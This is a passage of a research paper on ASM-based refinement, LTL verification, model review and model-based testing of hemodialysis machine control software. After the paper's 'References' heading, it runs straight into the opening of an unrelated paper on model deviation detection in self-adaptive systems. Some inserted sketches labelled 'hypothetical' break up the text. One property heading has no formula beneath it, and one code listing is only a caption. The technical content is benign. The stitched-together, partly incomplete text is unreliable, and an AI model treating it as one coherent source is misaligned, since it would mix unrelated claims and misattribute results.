Code 2 shows an example of a scenario for the first refined model, reproducing the whole therapy process. We defined the block initStatePrep, since its instructions regarding the initial state will be reused in scenarios written for other refinement steps. We also defined the block preparationPhase, containing instructions related to the PREPARATION phase. Such a block is further divided into sub-blocks (e.g., automaticTest); indeed, some scenarios will reuse the whole block preparationPhase, while others will reuse only some sub-blocks and redefine some others. Once a modeler is confident enough that the model correctly reflects the intended requirements, heavier techniques can be used for property verification. The case study document [48] reports a list of safety requirements (divided between general (S1-S11) and software (R1-R36) requirements) that must be guaranteed. We have specified them as LTL properties and verified them using the integrated model checker [6], which translates ASM models into models of the model checker NuSMV. Whenever a property is violated, the designer can inspect the returned counterexample to understand whether the problem is in the model, which is actually faulty, or in the property, which wrongly specifies the requirement; since counterexamples are returned as ASM runs, this task should be easy for the developer. Note that, thanks to meta-property MP10 of the model reviewer, we are also able to detect whether a property is vacuously satisfied, i.e., whether it is true regardless of the truth value of some of its sub-expressions. Since NuSMV works on finite state models, we have slightly modified our models by abstracting all the infinite domains with finite ones.
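The block mechanism we added to the validator behaves roughly like the following sketch (hypothetical Python names; the real validator interprets the scenario language of ASMETA, not Python, and the command contents here are illustrative):

```python
# Sketch of scenario blocks: a block is a named, reusable sequence of
# commands; execblock splices it into the current scenario. Hypothetical
# names -- the actual validator interprets its own scenario language.

blocks = {}

def define_block(name, commands):
    blocks[name] = commands          # begin <name> ... end

def expand(scenario):
    """Replace ('execblock', name) entries by the block's commands,
    expanding nested blocks recursively."""
    out = []
    for cmd in scenario:
        if cmd[0] == "execblock":
            out.extend(expand(blocks[cmd[1]]))
        else:
            out.append(cmd)
    return out

define_block("initStatePrep", [("check", "phase = PREPARATION")])
define_block("preparationPhase",
             [("execblock", "initStatePrep"),
              ("set", "auto_test_end := true"),   # illustrative command
              ("step",)])
scenario = [("execblock", "preparationPhase"), ("check", "phase = INITIATION")]
print(expand(scenario))
```

Nesting works because expansion is recursive: preparationPhase itself calls initStatePrep, and both are flattened into the final command sequence.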
As future work, we plan to support translation to nuXmv [52], which allows the verification of infinite-state systems. Each requirement has been proved as soon as possible in the chain of refinements, i.e., in the model that describes the elements involved in the requirement. At this refinement step, we were able to express only 13 of the 47 requirements; these are software requirements regarding the flow of bicarbonate concentration into the mixing chamber, the heating of the dialyzing fluid, and the detection of safety air conditions. For example, requirement R20 states that “if the machine is in the preparation phase and performs priming or rinsing or if the machine is in the initiation phase and if the temperature exceeds the maximum temperature, then the software shall disconnect the dialyzer from the DF and execute an alarm signal.” The requirement has been formalized in LTL as follows.

//R20
\[ g((phase = PREPARATION \land dialyzer\_connected \land prepPhase = RINSE\_DIALYZER \land \lnot error(TEMP\_HIGH) \land current\_temp = HIGH) \implies x(error(TEMP\_HIGH) \land alarm(TEMP\_HIGH) \land \lnot dialyzer\_connected)) \]

Note that some requirements are strictly related and somehow redundant and, therefore, can be verified together with only one property. This is the case of requirements R18 and R19, and of requirements R23-R32.
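The shape of such properties, g(p implies x(q)), can be illustrated on a finite simulation trace with a few lines of Python (a bounded, trace-level illustration only; the actual verification is performed symbolically by NuSMV over all runs, and the state fields below are simplified stand-ins for the model's locations):

```python
# Bounded check of the LTL pattern g(p -> x(q)) on a finite trace:
# whenever p holds in a state, q must hold in the next one.
# Trace-level illustration only; NuSMV verifies the property on the model.

def globally_implies_next(trace, p, q):
    return all(q(trace[i + 1]) for i in range(len(trace) - 1) if p(trace[i]))

# Toy states mimicking the R20 antecedent/consequent (fields simplified).
trace = [
    {"phase": "PREPARATION", "current_temp": "HIGH", "error": False,
     "alarm": False, "dialyzer_connected": True},
    {"phase": "PREPARATION", "current_temp": "HIGH", "error": True,
     "alarm": True, "dialyzer_connected": False},
]
p = lambda s: (s["phase"] == "PREPARATION" and s["current_temp"] == "HIGH"
               and not s["error"])
q = lambda s: s["error"] and s["alarm"] and not s["dialyzer_connected"]
print(globally_implies_next(trace, p, q))   # True
```

A counterexample to such a property is simply a run where p holds in some state and q fails in the next, which is exactly what the model checker returns as an ASM run.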
//R18-R19
\[ g((phase = PREPARATION \land prepPhase = RINSE\_DIALYZER \land dialyzer\_connected \land \lnot error(DF\_PREP) \land preparing\_DF \land \lnot detect\_bicarbonate) \implies x(error(DF\_PREP) \land alarm(DF\_PREP) \land \lnot dialyzer\_connected)) \]

//R23-R32
\[ g((phase = PREPARATION \land prepPhase = TUBING\_SYSTEM \land passed1Msec \land currentSAD = PERMITTED \land current\_air\_vol = PERMITTED \land \lnot error(SAD\_ERR)) \implies x(error(SAD\_ERR) \land alarm(SAD\_ERR))) \]

Requirements R20 and R23-R32 are related to both the preparation and initiation phases; R23-R32 also consider the ending phase. At this level of refinement, the corresponding properties can only check the preparation phase; they will be refined in the second refinement to take the initiation phase into consideration (see Sect. 5.2.3), and in the third refinement to consider the ending phase (see Sect. 5.2.4).

5.2.3. Second refinement: initiation phase

The second refinement extends the first one by refining the INITIATION phase. As shown in Table 1, the phase is further divided into two phases (recorded by function initPhase): the connection of the patient (CONNECT_PATIENT) and the running of the therapy (THERAPY_RUNNING). As shown in Fig. 8a, function patientPhase indicates in which step the patient is during the connection. We can see that the patient is initially connected arterially; then the blood pump is activated to extract the blood from the patient (in state BLOOD_FLOW). In this state, rule r_set_blood_flow can follow two different paths:

- **patientPhase** is updated to FILL_TUBING. Then, the operator sets the blood flow and the blood pump stops when the blood fills the tubes between the patient and the dialyzer.
After this, the patient is connected venously and the blood pump is restarted to fill the tubes between the dialyzer and the patient's vein.
- **patientPhase** is updated to END_CONN. Then, the therapy can start (i.e., initPhase moves to THERAPY_RUNNING).

Note that, in this case, the semantic visualization is not sufficient to completely understand the model behavior, since the two paths are taken in two subsequent executions of the rule. This can only be discovered by simulation. The therapy status is specified by function therapyPhase (see Fig. 8b). When the therapy status is THERAPY_EXEC, it is further specified by function arterialBolusPhase, whose semantic visualization is shown in Fig. 8c. This sub-phase consists of the infusion of saline solution and is activated by the operator. arterialBolusPhase is initially in state WAIT_SOLUTION until the operator presses the start button. After that, the doctor sets the volume of the saline solution, the solution is connected to the machine, and the infusion starts. When the predefined volume has been infused, arterialBolusPhase returns to the WAIT_SOLUTION state until the operator restarts the saline infusion. Also in this case, semantic visualization does not allow the machine behavior to be fully understood: the initial state of the graph in Fig. 8c can only be discovered through simulation. As required by our modeling process, before any further validation and verification activity on the requirements, it is necessary to guarantee the correctness of the refinement step. This has been carried out, similarly to what is described at the end of Sect. 5.2.2, by means of the refinement prover.

**Validation and Verification.** By model review, we found that some locations were trivially updated (meta-property MP4), i.e., the value of the location before the update was always equal to the new value. This means that the update is not necessary.
Removing trivial updates is important because the reader may otherwise have the feeling that the ASM is modifying its state when it is not. The trivial updates were related to signal_lamp when updated to GREEN, and to error(UF_DIR) and error(UF_RATE) when updated to true. The update of signal_lamp was indeed unnecessary and we removed it; the updates of error(UF_DIR) and error(UF_RATE), instead, were not correct, since the locations had to be updated to false, and so we fixed the fault. Moreover, we detected some violations of meta-property MP7, which requires that every controlled location is updated and every location is read. We found that functions bf_err_ap_low and reset_err_pres_ap_low were never updated: this was due to a wrong guard in a conditional rule. This shows that model review is also useful in detecting behavioral faults. We found that locations error(ARTERIAL_BOLUS_END), error(UF_BYPASS), and error(UF_VOLUME_ERR) were also never updated. This is due to the fact that functions error and alarm share the domain AlarmErrorType, representing the different alarms; for each alarm there is an error, except for ARTERIAL_BOLUS_END, UF_BYPASS, and UF_VOLUME_ERR. Therefore, locations error(ARTERIAL_BOLUS_END), error(UF_BYPASS), and error(UF_VOLUME_ERR) are actually unnecessary. We could have declared two different domains for errors and alarms, but we think that the specification would have been less clear and it would have been more difficult to keep the values of errors and alarms consistent. Therefore, we ignored the meta-property violation without changing the model. We also wrote some scenarios for this refinement step, such as the one shown in Code 3. We can see that the scenario reuses blocks initStatePrep and preparationPhase defined in scenario completeTherapyRef1 for the first refined model (see Code 2). At this modeling level, we were able to prove 23 more safety requirements.
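The kind of defect MP4 flags, a location written with the value it already holds, can be illustrated at the trace level (a simplified Python sketch; the actual model reviewer checks MP4 as a CTL formula on the model, not on traces):

```python
# Trace-level illustration of meta-property MP4 (no trivial updates):
# report any update that writes into a location the value it already holds.
# The real ASMETA reviewer checks this as a CTL formula on the model.

def trivial_updates(state, update_set):
    return [loc for loc, val in update_set.items() if state.get(loc) == val]

state = {"signal_lamp": "GREEN", "error(UF_DIR)": True}
updates = {"signal_lamp": "GREEN",      # trivial: already GREEN
           "error(UF_DIR)": False}      # effective update
print(trivial_updates(state, updates))  # ['signal_lamp']
```

In the actual model, the flagged update of signal_lamp was removed, while the flagged updates of the error locations turned out to be real faults (wrong target value).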
They concern patient connection, infusion of the saline solution when the patient is connected to the extra-corporeal blood circuit, pressure during the therapy, dialyzing fluid temperature, heparin infusion, air detected in the

---

**Code 3: Scenario for the second refinement**

```plaintext
scenario completeTherapyRef2
load HemodialysisRef2.asm
begin initStateInit
    execblock completeTherapyRef1.initStatePrep;
    check patientPhase = CONN_ART;
    check arterialBolusPhase = WAIT_SOLUTION;
    ...
end
execblock completeTherapyRef1.preparationPhase;
begin initiationPhase
    begin patientConnection
        check phase = INITIATION;
        check initPhase = CONNECT_PATIENT;
        check patientPhase = CONN_ART;
        set art_connected := true;
        step
        ...
    end
end
check phase = ENDING;
step
```

blood, and ultrafiltration process. Among these, we realized that some were not correctly described in [48]. For example, S1 states that “arterial and venous connectors of the EBC are connected to the patient simultaneously.” The corresponding LTL property is as follows:

\[ g(\text{art}_{\text{connected}} \iff \text{ven}_{\text{connected}}) \]

However, the property is false because the patient is first connected to the arterial connector and only then to the venous connector. Other requirements are instead ambiguous, and so we had problems in formalizing them. For example, S5 states that “the patient cannot be connected to the machine outside the initiation phase, e.g., during the preparation phase.” We did not know how to interpret “be connected”: as the patient status of being attached to the machine, or as the atomic action, performed by the operator, of connecting the patient to the machine? The former interpretation would require proving the following property:

\[ g((\text{art}_{\text{connected}} \lor \text{ven}_{\text{connected}}) \implies \text{phase} = \text{INITIATION}) \]

that, however, is false. Indeed, the patient can be attached to the machine also outside the INITIATION phase.
The latter interpretation, instead, would require proving the two following properties:

\[ g((\neg \text{art}_{\text{connected}} \land \text{x}(\text{art}_{\text{connected}})) \implies \text{phase} = \text{INITIATION}) \]

\[ g((\neg \text{ven}_{\text{connected}} \land \text{x}(\text{ven}_{\text{connected}})) \implies \text{phase} = \text{INITIATION}) \]

which are actually both true. It may be the case that this interpretation is not correct; this is a clear example of an ambiguous requirement that would need a clarification from the stakeholders. Ambiguity also characterizes requirements S2, S6, S7, and R16, for which we were not able to provide a satisfactory formalization. For example, S6 requires that BP cannot be used outside the INITIATION phase; however, Sect. 3.2 of [48] states that BP must also be used in the ENDING phase: therefore, we were not sure how to interpret and formalize such a requirement. In this refinement step, we could refine the properties related to requirements R20 and R23–R32 to also take the initiation phase into consideration.

//R20 updated

\[ g(((\text{phase} = \text{INITIATION} \land \neg \text{error}(\text{TEMP}\_\text{HIGH}) \land \text{current}\_\text{temp} = \text{HIGH}) \lor (\text{phase} = \text{PREPARATION} \land \text{dialyzer}_{\text{connected}} \land \text{prepPhase} = \text{RINSE}\_\text{DIALYZER} \land \neg \text{error}(\text{TEMP}\_\text{HIGH}) \land \text{current}\_\text{temp} = \text{HIGH})) \implies \text{x}(\text{error}(\text{TEMP}\_\text{HIGH}) \land \text{alarm}(\text{TEMP}\_\text{HIGH}) \land \neg \text{dialyzer}_{\text{connected}})) \]

//R23–R32 updated

5.2.4. Third refinement: ending phase

The third refinement extends the second one by refining the ENDING phase. As shown in Fig. 9a, the ending consists of a sequence of activities (specified by function endingPhase). When in REINFUSION, the phase is further refined by reinfusionPhase, whose semantic visualization is shown in Fig. 9b.
The reinfusion consists of an initial sequence of activities for starting the infusion of the saline solution, followed by a loop in which the doctor performs the solution reinfusion. Rule \texttt{r\_choose\_next\_reinf\_step} is responsible for deciding the loop termination: either going to START_SALINE_REIN (i.e., the operator decides to continue the reinfusion) or to REMOVE_VEN (i.e., the operator disconnects the patient). To complete modeling at this level, the refinement prover was used to prove that this model is a correct stuttering refinement of the second refinement. **Validation and Verification.** We applied model review also to this model, but we did not find any meta-property violation. We also wrote some new scenarios. In particular, we wrote scenarios reproducing the occurrence of some errors. Code 4 shows the scenario that triggers error TEMP_HIGH, related to a high temperature of the dialyzing fluid during the preparation phase. We can see that in this scenario we reused some sub-blocks of block preparationPhase defined in scenario completeTherapyRef1 (see Code 2), such as automaticTest and connectConcentrate. We did not use the whole block because the instructions related to the dialyzer rinsing had to be changed in order to trigger the error. In this refinement step, we were able to prove three more requirements. Moreover, we could refine the property related to requirements R23–R32 to also take the ending phase into consideration.
// R23–R32 updated

\[ g((((\text{phase} = \text{PREPARATION} \land \text{prepPhase} = \text{TUBING\_SYSTEM}) \lor (\text{phase} = \text{INITIATION} \land \text{bp.status.der} = \text{START}) \lor (\text{phase} = \text{ENDING} \land \text{endingPhase} = \text{REINFUSION} \land \neg \text{error.rein\_press} \land \text{bp.status.der} = \text{START})) \land \text{passed1Msec} \land \text{currentSAD} \neq \text{PERMITTED} \land \text{current\_air\_vol} \neq \text{PERMITTED} \land \neg \text{error}(\text{SAD\_ERR})) \implies \text{x}(\text{error}(\text{SAD\_ERR}) \land \text{alarm}(\text{SAD\_ERR}))) \]

Code 4: Scenario for the third refinement – Triggering of error TEMP_HIGH

Note that there are four requirements (S3, S8, S9, and S10) that we do not consider in our work. They are all related to the blood flow rate; for example, S8 requires that the “blood flow rate should be adjusted, taking into consideration the AP” [48]. However, since continuous values have been discretized for model checking, we are not able to express such requirements as temporal properties. As said before, as future work we plan to provide a mapping from ASM to nuXmv [52] that allows the verification of infinite-state systems: in this way, we will also be able to verify such kinds of requirements.

5.3. Conformance checking

We do not have access to the implementation of the hemodialysis device. Therefore, we have built a prototypical Java implementation of the hemodialysis device software, in order to show the last part of the ASM-based process, i.e., the conformance checking between the implementation and the specification, and how the process can help perform the activities required by steps 5.5–5.7 of the IEC 62304 standard, as well as step 5.8 on subsequent releases of medical software. Techniques of conformance checking are also useful for validation coverage and re-verification of software upon changes, as required by the FDA principles.
The implementation faithfully reflects (or at least should reflect) the case study requirements; however, some components (e.g., the connection with the hardware) have not been implemented and so they have been substituted with mock objects. Part of the Java implementation is shown in Code 5. Note that the implementation has many details that are not present in the specification, such as the graphical user interface (shown in Fig. 10), which visualizes the output of the device. The top part of the GUI shows the current state of the device, the bottom left part displays the status of alarms and errors (red means that there is an alarm/error, while green means that the component is working properly), and the bottom right part reports the configuration of the parameters. The implementation has been developed by two authors who were only partially involved in the writing of the specification; in this way, we aimed at reproducing a setting in which the system designers (also responsible for model-based testing) are different from the developers. Conformance checking can be done offline (i.e., before deployment) by MBT or online (i.e., after deployment) by runtime verification.
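As noted above, hardware-facing components were replaced by mock objects. A minimal sketch of this pattern follows; the interface and class names (`BloodPump`, `MockBloodPump`) are hypothetical illustrations, not names from the actual implementation:

```java
// Hypothetical hardware abstraction: a real driver would talk to the
// physical pump, while the mock only tracks state so that the control
// logic can be exercised without hardware.
interface BloodPump {
    void start();
    void stop();
    boolean isRunning();
}

class MockBloodPump implements BloodPump {
    private boolean running = false;

    public void start() { running = true; }

    public void stop() { running = false; }

    public boolean isRunning() { return running; }
}
```

The controller code depends only on the interface, so the mock can later be swapped for a real driver without touching the logic under test.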
```java
import org.asmeta.monitoring.*;

public class HemodialysisMachine {
    HemodialysisMachinePanel dialog;

    @FieldToFunction(func = "phase")
    Phases phase = Phases.PREPARATION;
    @FieldToFunction(func = "preparing_DF")
    boolean preparing_DF = false;
    @FieldToFunction(func = "initPhase")
    InitPhase initPhase = InitPhase.CONNECT_PATIENT;
    @FieldToFunction(func = "interrupt_dialysis")
    boolean interrupt_dialysis = false;
    @FieldToFunction(func = "error_heparin_resolve")
    boolean error_heparin_resolve = false;
    @Monitored(func = "blood_conductivity")
    int blood_conductivity = HIGH;

    public HemodialysisMachine() {
        dialog = new HemodialysisMachinePanel(this);
        dialog.setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE);
        dialog.setVisible(true);
    }

    @RunStep
    public void execDialysis() {
        if (phase == Phases.PREPARATION) { ... }
        dialog.updateGUI();
    }

    @MethodToFunction(func = "error")
    public boolean error(AlarmErrorType aet) {
        return error[aet.ordinal()];
    }
}
```

Code 5: Java implementation of the HMCS

Figure 10: Hemodialysis device program GUI

We here show the application of the former approach to the case study and refer the reader to [8, 12] for examples of applications of the latter approach. In MBT [35, 61], abstract test sequences are derived from the specification; such sequences are then concretized into tests for the implementation. In order to generate abstract test sequences, we use the MBT feature of ASMETA [32], which first derives from the specification some test goals (called test predicates) according to some coverage criteria [31], and then generates sequences covering these goals. For example, the update rule coverage criterion requires that each update rule is executed at least once in a test sequence and that the update is not trivial (i.e., the new value is different from the current value of the location).
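In other words, a test predicate for an update rule of the form "if guard then location := value" is essentially the conjunction of the rule's guard and the non-triviality condition `location != value`. A minimal sketch of how such a predicate string could be assembled (the class and method are illustrative assumptions, not ASMETA code):

```java
public class UpdateRulePredicate {
    // For an update rule "if <guard> then <location> := <newValue>",
    // the update rule coverage criterion asks for a reachable state in
    // which the guard holds and the update is not trivial, i.e. the
    // location does not already hold the new value.
    static String testPredicate(String guard, String location, String newValue) {
        return guard + " and " + location + " != " + newValue;
    }
}
```

For the rule updating therapyPhase to THERAPY_END under guard `interrupt_dialysis`, this yields `interrupt_dialysis and therapyPhase != THERAPY_END`, the same shape as the example predicate discussed in the text.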
A classical approach based on model checking is used for generating tests: the ASM model is translated into the language of a model checker, and each test goal is expressed as a temporal property (called a trap property); if the trap property is proved false, the returned counterexample is the abstract test sequence covering the test goal (and possibly other test goals as well). For this work, we extended the ASMETA MBT component in order to work with the model checker NuSMV. For the case study, we used the structural coverage criteria presented in [32]. Since the test generation approach is based on model checking, we used the same models we obtained to perform formal verification (having only finite domains). 980 test predicates have been built and 183 tests have been generated to cover them (in around 2 hours on a Linux PC with an Intel(R) Core(TM) i7 CPU and 8 GB of RAM). Note that each generated test can cover more than one test predicate, and we avoid generating tests for already covered test predicates. An example of a test predicate for the update rule coverage criterion is:

\[ \text{phase = INITIATION and initPhase = THERAPY\_RUNNING and therapyPhase = THERAPY\_EXEC and interrupt\_dialysis and therapyPhase != THERAPY\_END} \]

which requires observing a state in which the update rule setting therapyPhase to THERAPY_END fires and therapyPhase is not already equal to THERAPY_END. Note that a sequence covering this test predicate is guaranteed to exist if the specification has been previously checked with model review and no violation of MP4 (requiring that all update rules are not always trivial) occurred. The sequence covering the predicate is shown in Fig. 11. We can see that the test predicate holds in the last state of the sequence. In order to concretize the abstract test sequences into tests for the implementation, we need to provide a link between the specification and the implementation. In [8], we proposed a technique to do the linking using Java annotations.
We defined different annotations to:

- associate a Java class with the corresponding ASM model (@Asm);
- associate the ASM state with the Java state:
  - @FieldToFunction connects a Java field with an ASM controlled function;
  - @MethodToFunction connects a pure Java method (i.e., one returning a value without modifying the object state) with an ASM controlled function;
  - @Monitored connects a Java field with an ASM monitored function; such fields represent the inputs of the Java class that take their values from the environment (as monitored functions do in ASMs);
- associate the ASM behavior with the Java object behavior: @RunStep is used to annotate methods whose execution corresponds to a step of the ASM model.

Given the mapping provided by the Java annotations, we translated the abstract test sequences into JUnit tests following the technique described in [9]. For example, Code 6 shows the JUnit test corresponding to the sequence shown in Fig. 11. Each test is built by creating the initialization of the Java class and then, for each state of the corresponding abstract test sequence,

- updating the fields annotated with @Monitored to the values of the corresponding ASM functions. In the example, field `interrupt_dialysis` is updated to the value of the homonymous ASM function;
- invoking the method annotated with @RunStep. In the example, method `execDialysis()` (see Code 5) is executed;
- adding JUnit assert commands that check that the Java state conforms to the ASM state; they check that the values of the fields annotated with @FieldToFunction and the values returned by the methods annotated with @MethodToFunction are equal to the values of the corresponding ASM functions. In the example, fields `phase`, `initPhase`, `therapyPhase`, ... are linked with @FieldToFunction and checked during conformance checking.

We ran all 183 tests (divided into multiple JUnit files) and we actually found some conformance violations (i.e., some tests failed; see Fig. 12a).
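For concreteness, annotations of the kind described above can be declared as ordinary runtime-retained Java annotations and read back reflectively when concretizing abstract test sequences. The following is only a sketch under that assumption; these declarations and the `funcOf` helper are illustrative, not the actual ASMETA code:

```java
import java.lang.annotation.*;

// Runtime retention so the test concretizer can inspect the mapping
// between Java members and ASM functions via reflection.
@Retention(RetentionPolicy.RUNTIME) @Target(ElementType.FIELD)
@interface FieldToFunction { String func(); }

@Retention(RetentionPolicy.RUNTIME) @Target(ElementType.FIELD)
@interface Monitored { String func(); }

@Retention(RetentionPolicy.RUNTIME) @Target(ElementType.METHOD)
@interface RunStep { }

class AnnotationDemo {
    @FieldToFunction(func = "phase")
    String phase = "PREPARATION";

    @Monitored(func = "interrupt_dialysis")
    boolean interrupt_dialysis = false;

    @RunStep
    void execStep() { /* would correspond to one ASM step */ }

    // Helper a concretizer might use to recover the ASM function name
    // linked to a given field; returns null if the field is unknown.
    static String funcOf(String fieldName) {
        try {
            return AnnotationDemo.class.getDeclaredField(fieldName)
                    .getAnnotation(FieldToFunction.class).func();
        } catch (NoSuchFieldException e) {
            return null;
        }
    }
}
```

With such declarations in place, the generated JUnit tests never need hand-written glue: the field/function correspondence is recovered entirely from the annotations.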
We analyzed the failing tests and discovered that the authors writing the implementation had misunderstood some requirements. Consequently, the errors were fixed. The coverage obtained by the tests is shown in Fig. 12b: our tests were able to cover more than 90% of the Java code. Although the obtained coverage is already high, we found that some parts of the code are not covered, since the structure of the code differs in places from the structure of the specification, and using structural coverage criteria for test generation may not guarantee full coverage. We plan to study other criteria (like MCDC (Modified Condition/Decision Coverage) or property-based ones) in order to improve the coverage.

6. Related work and comparison with other approaches

The use of rigorous methods in the engineering of medical device software has been growing in recent years. A systematic review of the use of formal methods for medical software is presented in [20]; here we report the works most closely related to the approach presented in this paper. In the past, formal methods have been applied to a variety of medical devices. Osaiweran et al. [54] use the formal Analytical Software Design (ASD) [23] approach for the development of a power control service of an interventional X-ray system. Jiang et al. [42] present a methodology based on timed automata to extract timing properties of the heart that can be used for the verification and validation of implantable cardiac devices. Méry et al. [51] and Macedo et al. [47] present a pacemaker model in the Event-B [1] and VDM [43] methods, respectively. One of the medical devices relatively close to hemodialysis machines is the infusion pump. It is primarily responsible for delivering fluids, such as nutrients and medications, into a patient’s body in controlled amounts. Arney et al. [16] present a reference model of PCA (Patient Control Analgesia) infusion pumps and test the model for structural and safety properties. Campos et al.
[25] present a formal model in MAL (Modal Action Logic) [24] that helps compare different infusion devices and the functionalities they provide. Bowen et al. [22] use the ProZ model checker [55] to test various safety properties of infusion pumps. Considering the HMCS, Hoang et al. [36] present an Event-B [1] inspired solution. The main difference of the approach is the use of a multi-formal development paradigm where the requirements are modeled using the UML-like notation iUML-B [57] and then subsequently verified in the formal framework of Event-B using deductive theorem proving and model checking. The approach also lets the specification be validated using animation and Domain Specific Visualizations (DSVs). A similar Event-B based solution is also presented in [49, 50]. In this work, the requirements are specified using a refinement-based modeling approach, and are then checked for consistency and conformance using the standard theorem proving, model checking, and animation techniques. The resulting formal requirements model is fed to a code generator that transforms the formal model into sequential programming-language code that runs on the given hardware. The translation process is semi-automatic and requires post-processing of the generated code before the final deployment. The main limitation of the approach is that the supporting tool translates only a limited subset of the B syntax during the automatic translation process. Moreover, a formal proof that the translation process preserves the safety properties of the model is missing. The solution presented by Banach [17] is based on Hybrid Event-B [18], an extension of the Event-B framework that explicitly focuses on continuously varying state evolution, along with the usual discrete state transitions. The main difference of this approach comes from its ability to explicitly distinguish between the discrete and continuous elements of hemodialysis machines.
The resulting specification consists of two types of state transitions: natural discrete changes of state and continuously varying state changes. The model takes the individual discrete events of the model and interleaves them with continuous events. This makes it possible to specify the complete behavior of hemodialysis machines, considering both discrete and continuous elements. The drawback of the approach is the limited tool support. Hybrid Event-B relies on the Rodin platform [2] for specification and proving. However, not all features of Hybrid Event-B are supported by the Rodin platform, e.g., how to specify (and consequently prove) events capturing continuously changing behaviors (also known as pliant events), or single- and multi-machine systems in general. The solution presented by Fayolle et al. [29] is based on a combination of Algebraic State-Transition Diagrams (ASTD) [30] and Event-B. ASTDs use a graphical notation to model problems as a combination of state transition diagrams and classical process algebra operators like sequence, iteration, parallel composition, quantified choice, and quantified synchronization. The main difference of this solution comes from its multi-formal approach and from the way the sequencing order of the machine is described. Due to the use of a graphical notation, the model is easy to follow and validate. For verification purposes, the model relies on the strength of the Event-B platform, which stems from theorem proving and model checking. However, this means that the approach also suffers from the limitations associated with the Event-B method and its toolset.
Some of these limitations are: the lack of sophisticated tools and elaborated guidelines for managing the complexity of growing models by decomposition; the lack of an implicit notion of time (which would be necessary for an elegant expression of the timing properties that play a critical role in medical devices); and the failure of ProB [45] (at the detailed levels of refinement) to prove temporal properties of the system due to state space enumeration and explosion problems. In our opinion, a standard and more natural way is required to specify and prove that temporal properties of the system are preserved by Event-B refinements. Finally, a tool that is able to automatically generate ready-to-deploy machine code from Event-B formal models is also missing; currently available tools require manual post-processing of the generated code. The solution presented by Gomes et al. [34] is based on Circus [53], a fusion of the formal notation Z [59] and Communicating Sequential Processes (CSP). The main difference of this solution is the use of a well-defined theory of process algebra to specify the concurrent and parallel aspects of the system, and its explicit focus on timing properties. The main limitation of the approach is that no tool currently exists that directly supports the consistency and conformance checking of a Circus specification. In the current development, the Circus model is translated into machine-readable CSP, which is then model checked for verification purposes. The lack of automatic code generation from Circus models is another limitation. Explicitly regarding the problem of software certification, there exist a few attempts addressing this problem, like the CHI+MED project [27], which presents a formal methodology for certification and assurance of medical devices. More in general, Jetley et al. [41] advocate the use of formal methods for medical software quality assessment.
However, there is no standardized mapping between formal method processes and certification activities, and this paper tries to contribute to establishing one. The main novelty of our work, in relation to the comparable dialysis models and other applications of formal methods to medical device software, comes from its rigorous approach to quality assurance and its easy-to-understand formal notation. A comprehensive model analysis approach based on simulation, model review, model checking, and conformance checking gives a far better grasp of the notion of correctness than approaches comprising only a subset of the analysis techniques employed in this work. Additionally, the ASM method’s ease of use, understandability, and notion of refinement also help manage the complexity of the development process. A limitation of the approach is that no tool is currently available that is capable of automatically transforming an ASM model into programming language code. However, a tool translating ASM models to C++ for the Arduino platform has been developed [19].

7. Conclusions

Different certification standards have been proposed for the development of medical device software. However, these standards provide general indications regarding the typical software engineering activities that must be performed, but do not prescribe the use of any particular method, technique, or life cycle model. In this paper, we have shown how a development process based on the Abstract State Machine formal method can be used for assuring safety and reliability in the development of medical device software. The process consists of an iterative and incremental life cycle model based on model refinement: through a sequence of refined models, all the requirements of the system are considered. Different validation and verification activities (visualization, simulation, model review, model checking) can be performed on each model, and each refinement step can be automatically proved correct.
The implementation can be seen as the last refinement step, and its conformance with the formal specification can be checked by model-based testing and/or by runtime verification. We have described how the ASM-based process captures most of the activities required by the standards, and have shown the application of the ASM-based process to the hemodialysis machine case study. Acknowledgments The research reported in this paper has been partially supported by the Czech Science Foundation project number 17-12465S, and by the Austrian Ministry for Transport, Innovation and Technology, the Federal Ministry of Science, Research and Economy, and the Province of Upper Austria in the frame of the COMET center SCCH. References
# Timely and Accurate Detection of Model Deviation in Self-Adaptive Software-Intensive Systems

Yanxiang Tong (tongyanxiang@gmail.com), Yi Qin∗ (yiqincs@nju.edu.cn), Yanyan Jiang (jyy@nju.edu.cn), Chang Xu (changxu@nju.edu.cn), Chun Cao∗ (caochun@nju.edu.cn), Xiaoxing Ma (xxm@nju.edu.cn)

State Key Lab for Novel Software Technology, Nanjing University, Nanjing, China

ABSTRACT

Control-based approaches to self-adaptive software-intensive systems (SASs) are hailed for their optimal performance and theoretical guarantees on the reliability of adaptation behavior. However, in practice these guarantees are often threatened by model deviations that occur at runtime. In this paper, we propose a Model-guided Deviation Detector (MoD2) for timely and accurate detection of model deviations. To ensure reliability, a SAS can switch from its control-based optimal controller to a mandatory controller once an unsafe model deviation is detected. MoD2 achieves both high timeliness and high accuracy through a deliberate fusion of parameter deviation estimation, uncertainty compensation, and safe region quantification. Empirical evaluation with three exemplar systems validated the efficacy of MoD2 (93.3% shorter detection delay, 39.4% lower FN rate, and 25.2% lower FP rate), as well as the benefits of the adaptation-switching mechanism (abnormal rate dropped by 29.2%).

CCS CONCEPTS

• Software and its engineering → Software verification and validation; • Social and professional topics → Software selection and adaptation.
KEYWORDS

Self-Adaptive Software, Control Theory, Model Deviation

Permission to make digital or hard copies of part or all of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. Copyrights for third-party components of this work must be honored. For all other uses, contact the owner/author(s).

ESEC/FSE '21, August 23–28, 2021, Athens, Greece. © 2021 Copyright held by the owner/author(s). https://doi.org/10.1145/3468264.3468548

## 1 INTRODUCTION

Control theory has been increasingly adopted in developing self-adaptive software-intensive systems [56, 59]. In designing a control-based self-adaptive system (control-SAS for short), developers first identify a nominal model (e.g., a linear time-invariant model) of the subject system (a.k.a. the managed system, or the plant in control jargon), and then design a managing system (a.k.a. the controller in control jargon) based on the identified model with some (feedback) control mechanisms such as Proportional-Integral-Derivative control or Model Predictive Control. The advantage of this approach is that the control mechanisms have well-established mathematical foundations that theoretically guarantee the optimality and reliability of the resulting SAS [25, 47, 65].

However, software-intensive systems behave differently from the physical devices to which control theory is usually applied: their behavioral patterns are more dynamic and uncertain. During its execution, a managed software-intensive system's behavior often deviates from the identified nominal model [10, 25, 49]. This model deviation, if it goes beyond a certain region, will invalidate the theoretical guarantees and threaten the safety of the whole system [9, 17, 46, 65].
